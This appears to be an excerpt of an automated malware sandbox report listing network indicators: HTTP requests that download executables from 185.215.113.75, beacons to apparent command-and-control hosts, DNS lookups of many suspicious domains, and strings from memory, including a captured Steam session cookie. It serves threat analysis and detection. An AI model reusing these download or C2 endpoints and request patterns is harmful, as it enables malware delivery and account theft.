Source: global traffic	HTTP traffic detected: GET /files/2062973237/xkV9ZML.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/osint1618/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/mia_hined/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/5377122953/KbSwZup.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /adv/postback.php?pub=mixtwo&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: backgroundtasks.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /update/library/check.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: backgroundtasks.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update/library/update.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: backgroundtasks.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update/update.php?pub=mixtwo HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: aHost: backgroundtasks.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update/update.php?pub=mixtwo HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: bHost: backgroundtasks.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/6691015685/Bjkm5hE.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /update/get.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: backgroundtasks.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success?substr=mixfour&s=three&sub=non HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update/get.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: backgroundtasks.infoConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /info HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /update HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/1296014716/PqodvBZ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /service HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/2062973237/xkV9ZML.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Wed, 12 Feb 2025 21:03:48 GMTIf-None-Match: "67ad0cb4-5cc00"

Source: b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2854374146.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steam equals www.youtube.com (Youtube)
Source: BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=f23c08cd1388f4ffc2bbff6a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35138Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Feb 2025 09:35:33 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: b4fe2af6b4.exe, 00000016.00000003.2847743530.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recH4'Lh equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ignoredshee.com
Source: global traffic	DNS traffic detected: DNS query: importenptoc.com
Source: global traffic	DNS traffic detected: DNS query: mercharena.biz
Source: global traffic	DNS traffic detected: DNS query: paleboreei.biz
Source: global traffic	DNS traffic detected: DNS query: rebeldettern.com
Source: global traffic	DNS traffic detected: DNS query: voicesharped.com
Source: global traffic	DNS traffic detected: DNS query: inputrreparnt.com
Source: global traffic	DNS traffic detected: DNS query: torpdidebar.com
Source: global traffic	DNS traffic detected: DNS query: actiothreaz.com
Source: global traffic	DNS traffic detected: DNS query: garulouscuto.com
Source: global traffic	DNS traffic detected: DNS query: breedertremnd.com
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: floweringtstrip.help
Source: global traffic	DNS traffic detected: DNS query: soulfulimusic.cyou
Source: global traffic	DNS traffic detected: DNS query: edcatiofireeu.shop
Source: global traffic	DNS traffic detected: DNS query: impolitewearr.biz
Source: global traffic	DNS traffic detected: DNS query: toppyneedus.biz
Source: global traffic	DNS traffic detected: DNS query: lightdeerysua.biz
Source: global traffic	DNS traffic detected: DNS query: suggestyuoz.biz
Source: global traffic	DNS traffic detected: DNS query: hoursuhouy.biz
Source: global traffic	DNS traffic detected: DNS query: mixedrecipew.biz
Source: global traffic	DNS traffic detected: DNS query: affordtempyo.biz
Source: global traffic	DNS traffic detected: DNS query: pleasedcfrown.biz
Source: global traffic	DNS traffic detected: DNS query: backgroundtasks.info
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: opbafindi.com
Source: global traffic	DNS traffic detected: DNS query: api.ip.sb
Source: global traffic	DNS traffic detected: DNS query: effficientworkflow.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mercharena.biz

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q7BrL9O2sHeln77b8uPQejfK6Hcan5A8WVB%2B6e7blyBYSN2DwHbEBPolFJGX5yCQXlV3uuMqV3ouaq5FXBWZ1ig3cS2iiG2dkvlWgEMCzs8n%2BvfhwikRtar%2BG03gKNKX7A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d3a6fd9541b2-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 9113d40b78bdc47a-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9noZswK0xhzQNbPu%2FnNuqOnWbyMVFnQAFC5weKBhcwaNR1mm8FMesFVibZNWwCbRc%2F3AudciEfEEwQDMHbSGiYdDLx4KWGrden7YNCQSOg2eegAgLzGw4Bg1GlixrE5SDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d40f8a19c411-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6%2Fq8jVYZVpkj25EiQ4oZnesMwllD59OjPu8MriCaG8uEBsfrEA3WTn2sXFqkX8fGvveWZyy94XFEwIz4D0xsJZP2zxESXYH3j2dKeCfe67ek%2FH%2FG9BRVjber9sYWr2dXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d413bcd943c1-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iZgSgVrGwkKnVMI9zs3QdsynddhsOEqgRhvffKpVUpoLhjDzncoyKI%2B6%2F4TkToJJ6L2tIACdegi43TV8WccTZdiEhynJOC8vb4CwEoW8fJ11NdCVs8NF1EPZam8q1VVI%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d41869a78c71-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MOmB8XH9zT5X2MazV6bRSadmjCIAxeAk5orEyF%2FTkKqMMEiYDwDRFdVCViXRtPced7gHB8cZ2I9LaPOlvE420Nt%2FSF6Oy4qfiUfDiy2bfG8ljAHCmisu5Fgq8lAhJMm34A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d41c5a140f43-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 9113d43e6ee442f5-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTSmGOlxc6gy%2BNaxR%2BGjaZwwsNpy6VSPRmYf3RVXvqyKQi6sGVdmPj8cwIBP4zOYHHWkT%2B2QrnyZums3PQjFjn65jyma1J%2B5qZsCToPnJDqcLSfGjW8Q73T7m3uEMPsdDVjlrKL%2FSg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d4428f09429d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bypFvRE4zeGv1xuNanM21dAyQ2D5kna6niZzSzEBsUn45iyFgG9qd8bYgs4mX9Nu98H85vyU8m4s7a%2F%2FykBmqs4%2BLDeoZi3IN%2B4HSOhL2JxLT8Zjv%2BIgBQOt%2Ft2vI0vl1Lc%2Bmsj24A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d4470add0f95-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFFx%2BXvtM2XCuu4UnEVifoKRaQMJJen1sZbGj0L2q4WhgiFX3nLqCWDxEgiO5DIapeSkKPAd1rPXfMlymZ8W807CHJSkGDBChGGzP6XLdkA3hNGwlMg62qA3XbmcK51sLQ7MisJZhg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d44b6c9ac402-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANOEKP5aklIn7Mq1X7TEXgGZ1uHJNAUArcs6TVVABngRI8vlheJSMw733Eye7UTD86vjaLISXP0Hp34bc3nmZi1jd6C9DmEIP39oyywjJKO6zotYZP7PlWyKSlC7soe6JS9WjJId8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d44f8bfb4331-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:35:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VrJRokDnJIdCLg6HYRDpZCKa0b%2FHIdHmI8atQ8tcHZAhockqd9BFTsv8SREV%2FcZwwjrCV1VXaqVvc8gPnT7HnbdW8k3%2BQB0SMfw4c2%2FIXhguVIZBxat%2Fp5V9hIKowmWJ%2BsBScc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d4924d75440b-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:36:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sxXnWbpO44EwRIIqw2QAoefA9pJTwwqovkVJg87BAgyCCPNFcuc%2F0KxA0ezJjnxpXdyc%2FjSM7%2FInUKSzOXPcH0vT%2B%2FAKcCQ8H0j6MgnIyoLhlUygc1twmfTAJpaZ4fDHhHaNh40%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d4e80ac84316-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Feb 2025 09:36:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oLfIox8femkYQ%2BukSMpdXAZI9k8t7YAHNoPwVye4RJX5fxYH5V3nRkMC%2Bs%2FSXMY6xrdqSPAGHEE1BMOjypnpK%2FSnNacrO1mSW3xHIi%2F5c8hLsaocDFAQQ0k38EDbqOQphg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9113d5b2fa0b0c78-EWR

Source: ViGgA8C.exe, 0000001F.00000002.3438808735.000000000530F000.00000004.00000800.00020000.00000000.sdmp, ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791
Source: ViGgA8C.exe, 0000001F.00000002.3438808735.0000000005271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.84.89.222:33791/
Source: b4fe2af6b4.exe, 00000016.00000003.2840883418.000000000177B000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2841047432.0000000001792000.00000004.00000020.00020000.00000000.sdmp, b4fe2af6b4.exe, 00000016.00000003.2847865403.0000000001791000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000003.3117214209.000000000078C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.3119822023.000000000078C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ervicehqos.dll.mui/
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/info
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/info.
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003290000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service#
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service7
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service73.73/service
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceSystem32
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicef
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/success?substr=mixfour&s=three&sub=non
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/success?substr=mixfour&s=three&sub=nonN
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/success?substr=mixfour&s=three&sub=nonn9
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/update
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003255000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/updatef
Source: BitLockerToGo.exe, 00000023.00000002.3400730393.0000000003280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/updateshqos.dll.mui
Source: skotes.exe, 00000006.00000002.3405621850.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3405621850.0000000001218000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
